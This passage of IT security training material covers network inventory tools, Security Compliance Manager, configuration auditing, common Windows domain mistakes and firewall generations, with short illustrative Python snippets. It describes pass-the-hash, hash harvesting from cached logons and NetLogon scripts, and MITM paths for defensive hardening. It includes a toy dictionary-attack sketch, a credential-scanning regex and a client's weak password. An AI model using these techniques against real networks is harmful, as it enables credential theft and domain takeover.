Main Functionalities:
 Real-time, subnet-level tracking of unmanaged, networked devices
 Detailed hardware information including slot description, memory configuration and
network adaptor configuration
 Extended plug-and-play monitor data including secondary monitor information
 Detailed asset-tag and serial number information, as well as embedded pointing device,
fixed drive and CD-ROM data
 Multi-layer information model – the idea is to represent the same equipment and
connections in several layers, with technology-specific information included in the
dedicated layer providing a consistent view of the network for the operator without an
information overflow.
 The layers represent both physical and logical information of the managed network,
including: physical network resources, infrastructure, physical connections, digital
transmission layer (SDH/SONET (STM-n, VC-4, VC-12, OC-n), PDH (E1, T1)),
telephony layer, IP-related layers, GSM/CDMA/UMTS-related layers as well as ATM
and FR layers
 History tracking - inventory objects (equipment, connections, numbering resources etc.)
are stored with full history of changes which enables change tracking; a new history entry
is made in three cases: object creation (the first history entry is made); object
modification (for each modification a new entry is added); and object removal (the last
history entry is made)
 Auto-discovery and reconciliation – keeps the stored information up-to-date
with the changes occurring in the network. The auto-discovery tool enables adding new
network elements to the inventory database, removing existing network elements from
the inventory database as well as updating the inventory database due to changed cards,
ports or interfaces
 Network planning – future object planning support (storing future changes in the
equipment, switches configuration, connections, etc.); plans are executed or applied by
the system logic – object creation / changing actually take place and planned objects
become active in the inventory system; enables visualization of the network state in the
future
 Inventory-Based Billing enables accurate calculations of customer charges for inventory
products and services (e.g. equipment, locations, connections, capacity); this module is
able to calculate charges for services leased from another operator (vendor) and resold
(with profit) to customers, and to generate invoices
 Inventory and Console Tools allow user-friendly management of important objects used
in the application (creating templates (Logical View, Report Management, Charts),
editing symbols and links, searching for objects, encrypting passwords and notifying
users of various actions/events)
 Wizards and templates provide flexibility but do not allow for inconsistent manipulation
of data; new objects are created with an object creation wizard (a so-called template),
which enables defining all attributes and necessary referential objects (path details for
connections, detailed elements (cards, ports) for equipment etc.); the user can define
which attributes of an object should be mandatory / predefined and if they should have a
constant value
 Process-driven Inventory – by introduction of automated processes, all user tasks related
to inventory data are done in the context of a process instance; changing the state of the
network (e.g. by provisioning a new service) cannot be done without updating
information in the inventory; this assures real-time accuracy of the inventory database
 Information theft – A network inventory management system not only keeps track of
your hardware but also your software. It also shows you who has access to that software.
A regular check of your system's inventory will let you know who has downloaded and
used software they may not be authorized to use.
 Equipment theft – A network management system will automatically detect every piece
of equipment and software connected to your system. And it will also let you know which
items are not working properly, which items need to be replaced, and which items have
mysteriously disappeared. Eliminate workplace theft simply by running a regularly
scheduled inventory check.
 Licensing agreements – An inventory of your software and licensing agreements will let
you know if you've got the necessary licensing agreements for all your software.
Insufficient licensing can cost you usage fees and fines and duplicating software that you
already have is an unnecessary expense.
 System Upgrades – Outdated equipment and software can cost your company time,
money, and resources. Downtime and slow response times are two of the biggest time
killers for your business. Set filters on your network inventory management system to
alert you when it's time to upgrade software or replace hardware with newer technology
to keep your system running as smoothly and efficiently as possible.
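The auto-discovery and reconciliation flow described in the functionality list above can be sketched as a merge of the discovered-device set against the stored inventory. This is an illustrative sketch, not any specific product's API; the element names and attributes are made up:

```python
# Reconcile auto-discovered network elements against the inventory database:
# add new elements, remove vanished ones, and update changed cards/ports.

def reconcile(inventory: dict, discovered: dict):
    """Both arguments map element-id -> attribute dict (cards, ports, ...)."""
    added   = {k: v for k, v in discovered.items() if k not in inventory}
    removed = [k for k in inventory if k not in discovered]
    updated = {k: v for k, v in discovered.items()
               if k in inventory and inventory[k] != v}

    inventory.update(added)    # new network elements
    inventory.update(updated)  # changed cards, ports or interfaces
    for k in removed:          # elements no longer present in the network
        del inventory[k]
    return added, removed, updated

inv  = {"sw1": {"ports": 24}, "rtr1": {"cards": ["E1"]}}
seen = {"sw1": {"ports": 48}, "fw1": {"ports": 8}}
added, removed, updated = reconcile(inv, seen)
```

A real system would also write a history entry for each of the three cases (creation, modification, removal), as described in the history-tracking bullet.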
Benefits:
 End-to-end view of multi-vendor, multi-technology networks
 Reduced network operating cost
 Improved utilization of existing resources
 Quicker, more efficient change management
 Visualization and control of distributed resources
 Seamless integration within the existing environment
 Automatically discovers and diagrams network topology
 Automatic generation of network maps in Microsoft Office Visio
 Automatically detects new devices and changes to network topology
 Simplifies inventory management for hardware and software assets
 Addresses reporting needs for PCI compliance and other regulatory requirements
 Provides powerful capabilities, including:
o Inventory management for all systems
o Direct access to Windows, Macintosh and Linux devices
o Automatically save hardware and software configuration information in a SQL
database
o Generate systems continuity and backup profiler reports
o Use remote management capabilities to shut down, restart and launch
applications
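The "save hardware and software configuration information in a SQL database" capability can be sketched with the standard library; sqlite3 here stands in for whatever SQL backend a real product would use, and the host name and settings are made up:

```python
import sqlite3

# Persist per-host hardware/software configuration snapshots in a SQL table.
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE config (
    host TEXT, item TEXT, value TEXT,
    PRIMARY KEY (host, item))""")

def save_config(host, info):
    # INSERT OR REPLACE keeps one current value per (host, item) pair.
    conn.executemany(
        "INSERT OR REPLACE INTO config VALUES (?, ?, ?)",
        [(host, k, str(v)) for k, v in info.items()])
    conn.commit()

save_config("pc-042", {"memory_mb": 16384, "os": "Windows 10", "antivirus": "yes"})
rows = conn.execute(
    "SELECT item, value FROM config WHERE host = ?", ("pc-042",)).fetchall()
```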
Completing the gaps with scripts
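As an illustration of the kind of gap-filling script this section refers to, the sketch below flags devices that answer on the network but are missing from the inventory. The addresses and set names are hypothetical:

```python
# Devices answering on the network (e.g. collected by an ARP/ping sweep)...
seen_on_network = {"10.0.0.5", "10.0.0.9", "10.0.0.23"}
# ...versus devices recorded in the inventory database.
in_inventory = {"10.0.0.5", "10.0.0.9"}

# Set difference yields the unmanaged/undocumented devices.
gaps = sorted(seen_on_network - in_inventory)
for ip in gaps:
    print(f"not in inventory: {ip}")
```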
Creating Device Groups (Security Level, Same
Version…)
Creating Policies
Microsoft released Security Compliance Manager along with a heap of new
security baselines for you to use to compare against your environment. In case you
are not familiar with SCM, it is a great product from Microsoft that
consolidates all the best practices for their software with in-depth explanations for
each setting.
Notably, this new version has security baselines for Exchange Server 2010 and 2007. These baselines are also
customized for the specific role of the server. Also interesting is that the baseline settings include not only group policy
computer settings but also PowerShell commands to configure aspects of the product that are not as simple to make as
a registry key change.
As you can see from the image below, the PowerShell script to perform the required configuration is listed in the detail
pane.
Attachments and Guidelines
Another new feature you might notice is that there is now a section called Attachments and
Guidelines, which has a lot of support documentation relating to the security baselines. This
section also allows you to add your own supporting documentation to your custom baseline
templates.
How to Import an existing GPO into Microsoft Security Compliance Manager v2
To start you simply need to make a backup of the existing Group Policy Object via the Group
Policy Management Console and then import it by selecting the “Import GPO” option in the new
tool at the top right corner (see image below).
Select the path to the backup of individual GPO (see image below).
Once you click OK the policy will then import into the SCM tool.
Once the GPO is imported the tool will look at the registry path and if it is a known value it will
then match it up with the additional information already contained in the SCM database (very
smart).
Now that you have the GPO imported into the SCM tool you can use the "Compare" option to see the
differences between this and the other baselines.
How to compare Baseline settings in the Security Compliance Manager tool
Simply select the policy you want to compare on the left hand column and then select the
“Compare” option on the right hand side (see image below).
Now select the Baseline policy you want to do the comparison with and press OK.
The result is a report showing the settings and values that are different between the two
policies.
The values tab will show you all the common settings between the policies that have different
values and the other tab will show you all the settings that are uniquely configured in either
policy.
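The comparison report described above (common settings whose values differ, plus settings unique to either policy) can be sketched as plain dictionary set operations. The setting names and values are illustrative, not taken from any real baseline:

```python
def compare_baselines(a: dict, b: dict):
    """Each baseline maps setting name -> configured value."""
    # "Values tab": settings present in both policies but with different values.
    different = {k: (a[k], b[k]) for k in a.keys() & b.keys() if a[k] != b[k]}
    # "Other tab": settings uniquely configured in either policy.
    only_a = sorted(a.keys() - b.keys())
    only_b = sorted(b.keys() - a.keys())
    return different, only_a, only_b

gpo      = {"MinimumPasswordLength": 8,  "AuditLogonEvents": "Success"}
baseline = {"MinimumPasswordLength": 14, "AuditLogonEvents": "Success",
            "RestrictAnonymous": 1}
different, only_gpo, only_baseline = compare_baselines(gpo, baseline)
```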
Auditing to verify security in practice
How to avoid risk from inconsistent network and security
configuration practices?
Regulations define specific traffic and firewall policies that must be deployed, monitored,
audited, and enforced. Unfortunately, due to organizational silos, organizations often lack the ability to
seamlessly assess when a network configuration allows traffic that is "out of policy" per
compliance, corporate mandate, or industry best practice.
Configuration Audit:
Configuration Audit tools provide automated collection, monitoring, and audit of configuration
across an organization's switches, routers, firewalls, and IDS/IPS. Through a unique ability to
normalize multi-vendor device configuration, these tools provide a detailed and intuitive assessment of how
devices are configured, including defined firewall rules, security policy, and network hierarchy.
These solutions maintain a history of configuration changes, audit configuration rules on a
device, and compare this across devices. Intelligently integrated with network activity data,
device configuration data is instrumental in building an enterprise-wide representation of a
network's topology. This topology mapping helps an organization understand allowed and
denied activity across the entire network, resulting in improved consistency of device
configuration and flagged configuration changes that introduce risk to the network.
Configuration auditing solutions vary across the following types:
1. Configuration Management Software – Usually provides a comparison between two
configuration sets, and also a comparison against a specific compliance template
2. Configuration Analyzers – Mostly common in analyzing Firewall configurations known
as “Firewall Analyzer” and “Firewall Configuration Analyzer”
3. Local Security Compliance Scanners – Tools such as MBSA (Microsoft Baseline
Security Analyzer) provide local system configuration analysis
4. Vulnerability Assessment Products – aka “Security Scanners”
Vulnerability scanners can be used to audit the settings and configuration of operating systems,
applications, databases and network devices. Unlike vulnerability testing, an audit policy is used
to check various values to ensure that they are configured to the correct policy. Example policies
for auditing include password complexity, ensuring that logging is enabled, and testing that
anti-virus software is installed properly.
Audit policies of common vulnerability scanners have been certified by the US Government or
Center for Internet Security to ensure that the auditing tool accurately tests for best practice and
required configuration settings.
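An audit policy of this kind is essentially a list of expected values checked against the target's actual configuration. A minimal sketch, with rule names and thresholds that are illustrative rather than taken from any certified policy:

```python
# Check collected system settings against an audit policy of expected values.
policy = {
    "min_password_length": lambda v: isinstance(v, int) and v >= 12,  # complexity
    "logging_enabled":     lambda v: v is True,   # logging configured correctly
    "antivirus_installed": lambda v: v is True,   # AV installed properly
}

def audit(settings: dict):
    """Return the list of policy items the system fails."""
    return [name for name, ok in policy.items()
            if not ok(settings.get(name))]

failures = audit({"min_password_length": 8,
                  "logging_enabled": True,
                  "antivirus_installed": True})
```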
When combined with vulnerability scanning and real-time monitoring with the auditing
tools offer some powerful features such as:
 Detecting system change events in real-time and then performing a configuration audit
 Ensuring that logging is configured correctly for Windows and Unix hosts
 Auditing the configuration of a web application's operating system, application and SQL
database
Audit policies may also be deployed to search for documents that contain sensitive data such as
credit card or Social Security numbers. A basic tenet of most IT management practices is to
minimize variance. Even though your organization may consist of certain types of operating
systems and hardware, small changes in drivers, software, security policies, patch updates and
sometimes even usage can have dramatic effects on the underlying configuration. As time goes
by, these servers and desktop computers can have their configuration drift further away from a
"known good" standard, which makes maintaining them more difficult.
The following are the most common types of auditing provided by security auditing tools:
 Application Auditing
Configuration settings of applications such as web servers and anti-virus can be tested
against a policy.
 Content Auditing
Office documents and files can be searched for credit card numbers and other sensitive
content.
 Database Auditing
SQL database settings, as well as settings of the host operating system, can be tested for
compliance.
 Operating System Auditing
Access control, system hardening, error reporting, security settings and more can be
tested against many types of industry and government policies.
 Router Auditing
Authentication, security and configuration settings can be audited against a policy.
Agentless vs. Agent-Based Security Auditing Solutions
The chart below provides a high level view of agent-based versus agentless systems; details
follow.
Solution Characteristic      Agentless       Agent-Based
-----------------------      ---------       -----------
Asset Discovery              Advantage       None/Limited
Asset Coverage               Advantage       Limited
Audit Comprehensiveness      Par             Par
Target System Impact         Advantage       Variable
Target System Security       Advantage       Variable
Network Impact               Variable/Low    Low
Cost of Deployment           Advantage       High
Cost of Ownership            Advantage       High
Scalability                  Advantage       Limited
Functionalities:
1. Asset Discovery: the ability to discover and maintain an accurate inventory of IT
assets and applications.
Agentless solutions typically have broader discovery capabilities – including both active
and passive technologies – that permit them to discover a wider range of assets. This
includes discovery of assets that may be unknown to administrators or should not be on
your network.
2. Asset Coverage: the breadth of IT assets and applications that can be assessed.
Many IT assets that need to be audited simply cannot accept agent software. Examples
include network devices like routers and switches, point-of-sale systems, IP phones and
many firewalls.
3. Audit Comprehensiveness: the degree of completeness with which the auditing
system can assess the target system’s security and compliance status.
Using credentialed access, agentless solutions can assess any configuration or data item
on the target system, including an analysis of system file integrity (file integrity
monitoring).
4. Target System Impact: the impact on the stability and performance of the scan
target.
Agentless solutions use well-defined remote access interfaces to log in and retrieve the
desired data, and as a result have a much more benign impact on the stability of the assets
being scanned than agent-based systems do.
5. Target System Security: the impact of the auditing system on the security of the
target system.
Agentless auditing solutions are uniquely positioned to conduct objective and trusted
security analyses because they do not run on the target system.
6. Network Impact: the impact on the performance of the associated network.
Although agentless auditing solutions gather target system configuration information
using a network-based remote login, actual network impact is marginal due to bandwidth
throttling and overall low usage.
7. Cost of Deployment: the time and effort required to make the auditing system
operational.
Since there are no agents to install, getting started with agentless solutions is significantly
faster than with agent-based solutions – typically hours rather than days or weeks.
8. Cost of Ownership: the time and effort required to update and adjust the
configuration of the auditing system.
Agentless solutions typically have much lower costs of ownership than agent-based
systems; deployment is easier and faster, there are fewer components to update and
configuration is centralized on one or two systems.
9. Scalability: the number of target systems that a single instance of the audit system
can reliably audit in a typical audit interval.
Agentless auditing solutions excel in scalability, as auditing scalability is virtually
unlimited simply by increasing the number of management servers.
10. Simplified configuration compliance
Simplifies configuration compliance with drag-and-drop templates for Windows and
Linux operating systems and applications from FDCC, NIST, STIGS, USGCB and
Microsoft. Prioritize and manage risk, audit configurations against internal policy or
external best practice and centralize reporting for monitoring and regulatory purposes.
11. Complete configuration assessment
Provides a comprehensive view of Windows devices by retrieving software configuration
that includes audit settings, security settings, user rights, logging configuration and
hardware information including memory, processors, display adapters, storage devices,
motherboard details, printers, services, and ports in use.
12. Out-of-the-box configuration auditing
Out-of-the-box configuration auditing, reporting, and alerting for common industry
guidelines and best practices to keep your network running, available, and accessible.
13. Datasheet configuration auditing
Compare assets to industry baselines and best practices to check whether any software or
hardware changes were made since the last scan that could impact your security and
compliance objectives.
14. Up-to-date baselines
With this module, a complete configuration compliance benchmark library keeps systems
up-to-date with industry benchmarks including changes to benchmarks and adjustments
for newer operating systems and applications.
15. Customized best practices
Customized best practices for improved policy enforcement and implementation for a
broad set of industry templates and standards including built-in configuration templates
for NIST, Microsoft, and more.
16. Built-in templates
Built-in templates for Windows and Linux operating systems and applications from
FDCC, NIST, STIGS, USGCB, and Microsoft.
17. OVAL 5.6 SCAP support
18. Streamlined reporting
Streamlined reporting for government and corporate standards with built-in vulnerability
reporting.
Case Studies Summary: Top 10 Mistakes -
Managing Windows Networks
“The shoemaker's son always goes barefoot”
 Network Administrators who use Windows XP or Windows 7 without UAC on their
own computer
 Network Administrators who have a weak password for a local administrator account on
their machine
o An Example from a real client: Zorik:12345
 Network Administrators whose computers are excluded from security scans
 Network Administrators whose computers lack security patches
 Network Administrators whose computers don't have an Anti-Virus
 Network Administrators with unencrypted Laptops
Domain Administrators on Users VLAN
 In most organizations administrators and users are connected to the same VLAN
 In this case, a user/attacker can:
o Attack the administrators' computers using NetBIOS Brute Force
o Spoof a NetBIOS name of a local server and attack using an NBNS Race
Condition Name Spoofing
o Take Over the network traffic using a variety of Layer 2 attacks and:
 Replace/Infect EXE files that will execute with network administrator
privileges
 Steal Passwords & Hashes of Domain Administrators
 Execute Man-In-The-Middle attacks on encrypted connections (RDP,
SSH, SSL)
Domain Administrator with a Weak Password
Domain Administrator without the Conficker Patch (MS08-
067)
(LM and NTLM v1) vs. (NTLM v.2)
 Once the hash of a network administrator is sent over the network, his identity can be
stolen:
o The hash can be used in a Pass-the-Hash attack
o The hash can be broken via Dictionary, Hybrid, Brute Force or Rainbow Tables
attacks
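The dictionary attack mentioned above simply hashes each candidate password and compares the result to the captured hash. In this sketch SHA-256 stands in for the real NT hash (which is MD4 over the UTF-16LE password); the attack logic is identical either way:

```python
import hashlib

def h(password: str) -> str:
    # Stand-in for the NT hash; real NTLM uses MD4 of the UTF-16LE password.
    return hashlib.sha256(password.encode()).hexdigest()

def dictionary_attack(captured_hash: str, wordlist):
    """Hash every candidate and compare against the stolen hash."""
    for candidate in wordlist:
        if h(candidate) == captured_hash:
            return candidate
    return None

# A complexity-compliant password that nevertheless sits in every wordlist.
captured = h("Password1!")
found = dictionary_attack(captured, ["123456", "letmein", "Password1!"])
```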
Pass the Hash Attack
Daily logon as a Domain Administrator
1. Is there any entity among men that meets the definition of "God"? (Obviously not…)
a. Computers shouldn’t have one either (refers to “Domain Administrator” default
privilege level)
b. Isn’t a network administrator a normal user when he connects to his machine?
c. Doesn’t the network administrator surf the internet?
d. Doesn’t he visit Facebook?
e. Doesn't he receive emails and open them?
f. Doesn't he download and install applications?
g. Can't an application he downloaded contain malware or a virus?
h. What can a virus do running under Domain Administrator privileges?
i. What is the potential damage to data, confidentiality and operability in costs?
Using Domain Administrator for Services
 Why does MSSQL “require” Domain Administrator privileges? (It doesn’t…)
 When a password is assigned to a service, the raw data of the password is stored locally
and can be extracted by a remote user with a local administrative account
 The scenario of a service actually requiring Domain Administrator privileges is
extremely rare (it almost doesn't exist) and mostly reflects a wrong or lazy analysis of the
real requirements by the decision maker
 In the most common case where a service requires an account which is different from
SYSTEM it only requires a local/domain user with only LOCAL administrative
privileges
 In the cases where a network manager or a service requires “the highest privileges”, they
only require local administrator on clients and/or operational servers but not the Domain
Administrator privilege. (which has login privileges to manage the domain controllers,
DNS servers, backup servers, and most of today's enterprise applications which integrate into
Active Directory)
Managing the network with Local Administrator Accounts
 In most cases the operational requirement is:
o The ability to install software on servers and client endpoint machines
o Connecting remotely to machines via C$ (NetBIOS) and Remote Registry
o Executing remote network scanning
o It is possible to execute 99% of the tasks using Separation of Duties,
assigning each privilege to a single user/account
 Users_Administrator_Group – Local Administrators
 Servers_Administrators_Group – Local Administrators
 Change Password Privilege
The NetLogon Folder
 Improper use of the Netlogon folder is the classic way to get Domain Administrator
privileges for a long term
 The most common cases are:
o Administrative Logon scripts with clear text passwords to domain administrator
accounts or local administrator account on all machines
o Free write/modify permission into the directory
 A logical problem, completely unnoticed, almost undetectable
 The longer the organization’s IT systems exist, the more “treasures” to discover
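A quick audit for the cleartext-password problem described above can be sketched as a scan of logon-script text for credential-looking lines. The regular expressions are illustrative heuristics, not an exhaustive detector:

```python
import re

# Lines in logon scripts that typically leak credentials, e.g.
# "net use X: \\server\share /user:DOMAIN\admin P@ssw0rd"
PATTERNS = [
    re.compile(r"/user:\S+\s+\S+", re.IGNORECASE),       # net use with password
    re.compile(r"password\s*[=:]\s*\S+", re.IGNORECASE), # password=... lines
]

def scan_script(text: str):
    """Return the lines that look like they contain cleartext credentials."""
    return [line for line in text.splitlines()
            if any(p.search(line) for p in PATTERNS)]

script = "net use X: \\\\srv\\apps /user:CORP\\admin S3cret!\necho done"
hits = scan_script(script)
```

A real audit would walk every .cmd/.bat/.kix/.vbs file in the NetLogon share and also check the share's write/modify permissions.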
The NetLogon Folder - test.kix – Revealing the Citrix UI Password
The NetLogon Folder - addgroup.cmd – Revealing the local Administrator of THE
ENTIRE NETWORK
The NetLogon Folder - password.txt – can’t get any better for a hacker
LSA Secrets & Protected Storage
 The Windows operating system implements an API to work securely with passwords
 Encryption keys are stored on the system and the encrypted data is stored in the registry
o Internet Explorer
o NetBIOS Saved Passwords
o Windows Service Manager
LSA Secrets
Protected Storage
Wireless Passwords
Cached Logons
 A user at his home, unplugged from the organizational internal network, cannot log into
the domain from his laptop
 Therefore, the network logon is simulated:
o The hash of the user’s password is saved on his machine
o When the user inputs his password, it is converted into a hash and compared to
the list of saved hashes; if a match is found, the system logs the user in
 The vulnerability: the default setting in Windows is to locally save hashes of the last 10
unique/different passwords used to connect to this machine
 In most cases, the hash of a domain administrator privileged account is on that list
 Most organizations don’t distinguish between PCs, Servers and Laptops when it comes to
the settings for this feature
 Most organizations don’t harden:
o The local PCs cached logons amount to 0
o The Laptops cached logons amount to 1
o The Servers to 0 (unless it's mission-critical, then 1 to 3 are recommended)
 It means that at least 50% of the machines contain a domain administrator's hash, from
which an attacker can take over the entire network
 Conclusion: A user/attacker with local administrator privileges can get a domain
administrator account from most of the organization’s computers
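The cached-logon mechanism described above can be sketched as a small cache of the last N password hashes, checked when the domain controller is unreachable. The hashing and account names are simplified stand-ins for the real Windows implementation:

```python
import hashlib
from collections import OrderedDict

CACHED_LOGONS_COUNT = 10  # Windows default; hardening lowers this to 0 or 1

cache = OrderedDict()  # username -> cached password hash, most recent last

def cache_logon(user, password):
    """Record a successful domain logon for later offline use."""
    cache[user] = hashlib.sha256(password.encode()).hexdigest()
    cache.move_to_end(user)
    while len(cache) > CACHED_LOGONS_COUNT:
        cache.popitem(last=False)  # evict the oldest cached credential

def offline_logon(user, password):
    """Simulated domain logon while unplugged from the network."""
    return cache.get(user) == hashlib.sha256(password.encode()).hexdigest()

cache_logon("CORP\\alice", "Hunter2!")
ok = offline_logon("CORP\\alice", "Hunter2!")
```

The security point above is the flip side of this convenience: whatever sits in that cache (often a domain administrator's hash) can be extracted by a local administrator.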
Password History
 In order to avoid users recycling their passwords on every forced password change, the
system saves the password hashes locally
 By default, the last 24 passwords are saved on the machine
 An attacker with local administrator privileges on the machine gets all the "password
patterns" of all the user accounts that ever logged into this machine
 A computer that was used by only 2 people will contain up to 48 different passwords
 Some of these passwords are usually used for other accounts in the organization
Users as Local Administrators
 When a user is logged on with local administrator privileges, the local system’s entire
integrity is at risk
 He can install privileged software and drivers such as promiscuous network drivers for
advanced network and Man-In-The-Middle attacks and Rootkits
 He is able to extract the hashes of all the old passwords of the users who ever logged
into the current machine
 He is able to extract the hashes of all the CURRENT passwords of the users who ever
logged into the current machine
Forgetting to Harden: RestrictAnonymous=1
Weak Passwords / No Complexity Enforcement
 Weak Passwords = A successful Brute Force
 Complexity-compliant passwords that nevertheless appear in a password dictionary, e.g.
"Password1!"
 Old passwords or default passwords of the organization
Guess what the password was? (gma )
Firewalls
Understanding Firewalls (1, 2, 3, 4, 5 generations)
A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set
of rules and is frequently used to protect networks from unauthorized access while permitting legitimate
communications to pass.
Many personal computer operating systems include software-based firewalls to protect against threats from
the public Internet. Many routers that pass data between networks contain firewall components and,
conversely, many firewalls can perform basic routing functions.
First generation: packet filters
The first paper published on firewall technology was in 1988, when engineers from Digital Equipment
Corporation (DEC) developed filter systems known as packet filter firewalls. This fairly basic system was
the first generation of what became a highly involved and technical internet security feature. At AT&T Bell
Labs, Bill Cheswick and Steve Bellovin were continuing their research in packet filtering and developed a
working model for their own company based on their original first generation architecture.
Packet filters act by inspecting the "packets" which transfer between computers on the Internet. If a packet
matches the packet filter's set of rules, the packet filter will drop (silently discard) the packet, or reject it
(discard it, and send "error responses" to the source).
This type of packet filtering pays no attention to whether a packet is part of an existing stream of traffic
(i.e. it stores no information on connection "state"). Instead, it filters each packet based only on information
contained in the packet itself (most commonly using a combination of the packet's source and destination
address, its protocol, and, for TCP and UDP traffic, the port number).
TCP and UDP protocols constitute most communication over the Internet, and because TCP and UDP
traffic by convention uses well known ports for particular types of traffic, a "stateless" packet filter can
distinguish between, and thus control, those types of traffic (such as web browsing, remote printing, email
transmission, file transfer), unless the machines on each side of the packet filter are both using the same
non-standard ports.
Packet filtering firewalls work mainly on the first three layers of the OSI reference model, which means
most of the work is done between the network and physical layers, with a little bit of peeking into the
transport layer to figure out source and destination port numbers.[8]
When a packet originates from the
sender and filters through a firewall, the device checks for matches to any of the packet filtering rules that
are configured in the firewall and drops or rejects the packet accordingly. When the packet passes through
the firewall, it filters the packet on a protocol/port number basis (GSS). For example, if a rule in the
firewall exists to block telnet access, then the firewall will block the TCP protocol for port number 23.
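A stateless packet filter like the one described can be sketched as a first-match walk over a rule list, where each rule examines only fields carried in the packet itself. The rule set below (blocking telnet on TCP port 23) is illustrative:

```python
# Each rule matches on (protocol, destination port); the action is the verdict.
RULES = [
    {"proto": "tcp", "dst_port": 23, "action": "drop"},   # block telnet
    {"proto": "tcp", "dst_port": 80, "action": "accept"}, # allow web browsing
]
DEFAULT = "accept"

def filter_packet(packet: dict) -> str:
    # Stateless: the verdict depends only on this packet's header fields,
    # never on any stored connection state.
    for rule in RULES:
        if (packet["proto"] == rule["proto"]
                and packet["dst_port"] == rule["dst_port"]):
            return rule["action"]
    return DEFAULT

verdict = filter_packet({"proto": "tcp", "src": "10.0.0.7",
                         "dst": "192.0.2.1", "dst_port": 23})
```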
Second generation: "stateful" filters
From 1989-1990 three colleagues from AT&T Bell Laboratories, Dave Presetto, Janardan Sharma, and
Kshitij Nigam, developed the second generation of firewalls, calling them circuit level firewalls.
Second-generation firewalls perform the work of their first-generation predecessors but operate up to layer
4 (transport layer) of the OSI model. They examine each data packet as well as its position within the data
stream. Known as stateful packet inspection, it records all connections passing through it and determines
whether a packet is the start of a new connection, a part of an existing connection, or not part of any
connection. Though static rules are still used, these rules can now contain connection state as one of their
test criteria.
Certain denial-of-service attacks bombard the firewall with thousands of fake connection packets in an
attempt to overwhelm it by filling up its connection state memory.
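Stateful inspection adds a connection-state table on top of the static rules; a minimal TCP sketch (the state table is deliberately simplified to a set of 4-tuples, ignoring sequence numbers and teardown):

```python
# Track TCP connections; only SYN packets may open new state.
state_table = set()

def inspect(pkt: dict) -> str:
    key = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
    if key in state_table:
        return "accept"        # part of an existing connection
    if pkt.get("syn"):         # start of a new connection
        state_table.add(key)
        return "accept"
    return "drop"              # mid-stream packet with no known connection

syn   = {"src": "10.0.0.7", "sport": 5555, "dst": "192.0.2.1", "dport": 443, "syn": True}
data  = {"src": "10.0.0.7", "sport": 5555, "dst": "192.0.2.1", "dport": 443}
stray = {"src": "10.0.0.9", "sport": 6666, "dst": "192.0.2.1", "dport": 443}
verdicts = [inspect(syn), inspect(data), inspect(stray)]
```

This also illustrates the DoS risk mentioned above: every accepted SYN adds an entry, so a flood of fake SYNs fills the state table.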
Third generation: application layer
The key benefit of application layer filtering is that it can "understand" certain applications and protocols
(such as File Transfer Protocol, DNS, or web browsing), and it can detect if an unwanted protocol is
sneaking through on a non-standard port or if a protocol is being abused in any harmful way.
The existing deep packet inspection functionality of modern firewalls can be shared by Intrusion
Prevention Systems (IPS).
Currently, the Middlebox Communication Working Group of the Internet Engineering Task Force (IETF)
is working on standardizing protocols for managing firewalls and other middleboxes.
Another axis of development is about integrating identity of users into Firewall rules. Many firewalls
provide such features by binding user identities to IP or MAC addresses, which is very approximate and
can be easily bypassed. The NuFW firewall provides real identity-based firewalling, by requesting the
user's signature for each connection. Authpf on BSD systems loads firewall rules dynamically per user,
after authentication via SSH.
Application firewall
An application firewall is a form of firewall which controls input, output, and/or access from, to,
or by an application or service. It operates by monitoring and potentially blocking the input,
output, or system service calls which do not meet the configured policy of the firewall. The
application firewall is typically built to control all network traffic on any OSI layer up to
the application layer. It is able to control applications or services specifically, unlike a stateful
network firewall which is - without additional software - unable to control network traffic
regarding a specific application. There are two primary categories of application
firewalls, network-based application firewalls and host-based application firewalls.
Network-based application firewalls
A network-based application layer firewall is a computer networking firewall operating at the application
layer of a protocol stack, and is also known as a proxy-based or reverse-proxy firewall. Application
firewalls specific to a particular kind of network traffic may be titled with the service name, such as a web
application firewall. They may be implemented through software running on a host or a stand-alone piece
of network hardware. Often, it is a host using various forms of proxy servers to proxy traffic before passing
it on to the client or server. Because it acts on the application layer, it may inspect the contents of the
traffic, blocking specified content, such as certain websites, viruses, and attempts to exploit known logical
flaws in client software.
Modern application firewalls may also offload encryption from servers, block application input/output from
detected intrusions or malformed communication, manage or consolidate authentication, or block content
which violates policies.
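The content-inspection step described above can be sketched as a small decision function a proxy-based firewall might apply before forwarding a request. The site list and signature bytes are purely illustrative, not taken from any real product:

```python
# Sketch of the content-inspection decision a proxy-based application firewall
# makes before forwarding traffic. Policy entries below are hypothetical.

BLOCKED_SITES = {"badsite.example"}                       # forbidden websites
MALWARE_SIGNATURES = [b"EICAR-STANDARD-ANTIVIRUS-TEST"]   # known-bad content patterns

def inspect_http(host: str, payload: bytes) -> str:
    """Return 'allow' or 'block' for one proxied HTTP exchange."""
    if host in BLOCKED_SITES:
        return "block"        # policy: specified website is blocked
    if any(sig in payload for sig in MALWARE_SIGNATURES):
        return "block"        # policy: payload matches a malware signature
    return "allow"
```

Because the proxy sees the full application-layer content, it can make this decision on the payload itself rather than only on ports and addresses.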
Host-based application firewalls
A host-based application firewall can monitor any application input, output, and/or system service calls
made from, to, or by an application. This is done by examining information passed through system calls
instead of or in addition to a network stack. A host-based application firewall can only provide protection
to the applications running on the same host.
Application firewalls function by determining whether a process should accept any given connection.
Application firewalls accomplish their function by hooking into socket calls to filter the connections
between the application layer and the lower layers of the OSI model. Application firewalls that hook into
socket calls are also referred to as socket filters. Application firewalls work much like a packet filter but
application filters apply filtering rules (allow/block) on a per process basis instead of filtering connections
on a per port basis. Generally, prompts are used to define rules for processes that have not yet received a
connection. It is rare to find application firewalls not combined or used in conjunction with a packet filter.
Also, application firewalls further filter connections by examining the process ID of data packets against a
ruleset for the local process involved in the data transmission. The extent of the filtering that occurs is
defined by the provided ruleset. Given the variety of software that exists, application firewalls tend to have
complex rule sets only for standard services, such as sharing services. These per-process rule sets have
limited efficacy in filtering every possible association that may occur with other processes. In addition, per-
process rule sets cannot defend against modification of the process via exploitation, such as memory
corruption exploits. Because of these limitations, application firewalls are beginning to be supplanted by a
new generation of application firewalls that rely on mandatory access control (MAC), also referred to as
sandboxing, to protect vulnerable services. Examples of next generation host-based application firewalls
which control system service calls by an application are AppArmor and the TrustedBSD MAC framework
(sandboxing) in Mac OS X.
Host-based application firewalls may also provide network-based application firewalling.
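The per-process model described above can be sketched as a verdict table keyed by process name rather than by port, with a prompt for processes that have no rule yet. The process names are illustrative:

```python
# Sketch of per-process filtering: rules apply per process, not per port.
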